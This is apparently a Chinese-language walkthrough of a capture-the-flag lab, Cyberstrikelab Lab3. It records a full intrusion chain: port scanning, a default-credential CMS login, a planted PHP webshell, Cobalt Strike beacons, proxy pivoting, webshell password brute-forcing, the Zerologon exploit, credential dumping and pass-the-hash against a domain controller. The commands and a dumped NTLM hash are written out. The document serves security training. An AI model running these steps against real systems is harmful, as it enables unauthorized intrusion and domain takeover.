Cyberstrikelab-Lab3

信息收集

sudo fscan -h 192.168.10.0/24 -p 0-65535
   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 192.168.10.10   is alive
(icmp) Target 192.168.10.233  is alive
[*] Icmp alive hosts len is: 2
192.168.10.233:22 open
192.168.10.10:139 open
192.168.10.10:135 open
192.168.10.10:445 open
192.168.10.10:3306 open
192.168.10.10:3590 open
192.168.10.10:5040 open
192.168.10.233:8080 open
192.168.10.233:11333 open
192.168.10.10:49668 open
192.168.10.10:49667 open
192.168.10.10:49666 open
192.168.10.10:49665 open
192.168.10.10:49664 open
192.168.10.10:49670 open
192.168.10.10:49669 open
[*] alive ports len is: 16
start vulscan
[*] WebTitle http://192.168.10.233:11333 code:404 len:19     title:None
[*] WebTitle https://192.168.10.233:8080 code:404 len:19     title:None
[*] WebTitle http://192.168.10.10:3590 code:200 len:4047   title:taoCMS演示

Flag1

taoCMS管理页面前端密码泄露

• 访问http://192.168.10.10:3590页面，进入管理，需要登陆。

• taoCMS可能存在前端密码泄露

• 使用默认账号密码admin:tao成功登陆后台。
  
  
  

• 选择文件管理-随便新建一个php文件-写入一句话木马。

• 使用蚁剑连接

GetFlag

go-flag{IpbKNIOigmnsuwY3}

Flag2

在kali上启动CS的服务端和客户端，利用监听生成攻击载荷，通过蚁剑上传运行，上线cs

在利用CS的插件上传运行fscan收集20段信息

192.168.10.233:22 open
192.168.10.233:8080 open
192.168.10.10:3306 open
192.168.10.10:445 open
192.168.10.10:139 open
192.168.10.10:135 open
[+] 192.168.10.10 CVE-2020-0796 SmbGhost Vulnerable
[*] WebTitle:http://192.168.10.233:8080 code:400 len:0      title:None
[*] WebTitle:https://192.168.10.233:8080 code:404 len:19     title:None
192.168.20.10:445 open
192.168.20.30:139 open
192.168.20.30:88 open
192.168.20.10:3306 open
192.168.20.30:445 open
192.168.20.20:139 open
192.168.20.20:445 open
192.168.20.10:139 open
192.168.20.30:135 open
192.168.20.20:135 open
192.168.20.10:135 open
192.168.20.20:3306 open
NetInfo:
[*]192.168.20.20
   [->]cyberweb
   [->]192.168.20.20
[+] 192.168.20.10 CVE-2020-0796 SmbGhost Vulnerable
NetInfo:
[*]192.168.20.30
   [->]WIN-7NRTJO59O7N
   [->]192.168.20.30
[*] 192.168.20.20        CYBERSTRIKELAB\CYBERWEB          Windows Server 2012 R2 Standard 9600
[*] 192.168.20.30  [+]DC 
__MSBROWSE__\WIN-7NRTJO59O7N   
192.168.20.30:88 open
192.168.20.30:53 open
192.168.20.20:139 open
192.168.20.30:139 open
192.168.20.10:139 open
192.168.20.20:135 open
192.168.20.30:135 open
192.168.20.10:135 open
192.168.20.30:389 open
192.168.20.20:445 open
192.168.20.30:445 open
192.168.20.10:445 open
192.168.20.30:464 open
192.168.20.30:593 open
192.168.20.30:636 open
192.168.20.30:3269 open
192.168.20.30:3268 open
192.168.20.20:3306 open
192.168.20.10:3306 open
192.168.20.10:3590 open
192.168.20.10:5040 open
192.168.20.20:5985 open
192.168.20.20:8055 open

突然想起来，flag2题目中有提示,主页有木马，盲猜在index.php

用CS做个代理转发，并在攻击机kali上设置代理sudo vim /etc/proxychains4.conf

测试一下代理
proxychains4 curl -v http://192.168.20.20:8055，回显正常

使用awBruter工具,爆破一句话木马

工具地址[https://github.com/theLSA/awBruter/]
sudo proxychains4 python2 awBruter.py -u "http://192.168.20.20:8055/index.php"

爆破出来密码是admin123
蚁剑做代理，设置CS对应端口。(如果测试连接不成功，可以尝试换个端口）

GetFlag

go-flag{C2AoW93mioh5XYQg}

Flag3

上线20机子

TCP Beacon(正向)

• 正向连接
• 和SMB Beacon比较类似。也需要一个父beacon
• SMB Beacon，TCP Beacon 与 Cobalt Strike 中派生 payload 的大多数动作相兼容。除了一些 要求显式 stager 的用户驱动的攻击（比如： Attacks → Packages 、 Attacks → Web Drive-by ）。
  
  
  
  在受害机运行beacon.exe
  在中转机器的Beacon里使用connect [ip address] [port]命令进行正向连接，即可上线：
  

CVE-2020-1472域控提权，获取域控hash

通过cs的插件没成功，就手工做了一遍

proxychains4 python cve-2020-1472-exploit.py WIN-7NRTJO59O7N 192.168.20.30

proxychains4 python secretsdump.py 'cyberstrikelab.com/WIN-7NRTJO59O7N$@192.168.20.30' -no-pass

proxychains4 python wmiexec.py -hashes :f349636281150c001081894de72b4e2b cyberstrikelab.com/administrator@192.168.20.30

PTH攻击(Pass-the-Hash)

因为这是靶机所以只用利用漏洞进入系统就行，但是要是真实环境，还需恢复机器密码，这里就不赘述了。。有兴趣自行了解一下

GetFlag

go-flag{ueoJt7eB6AQL8OpL}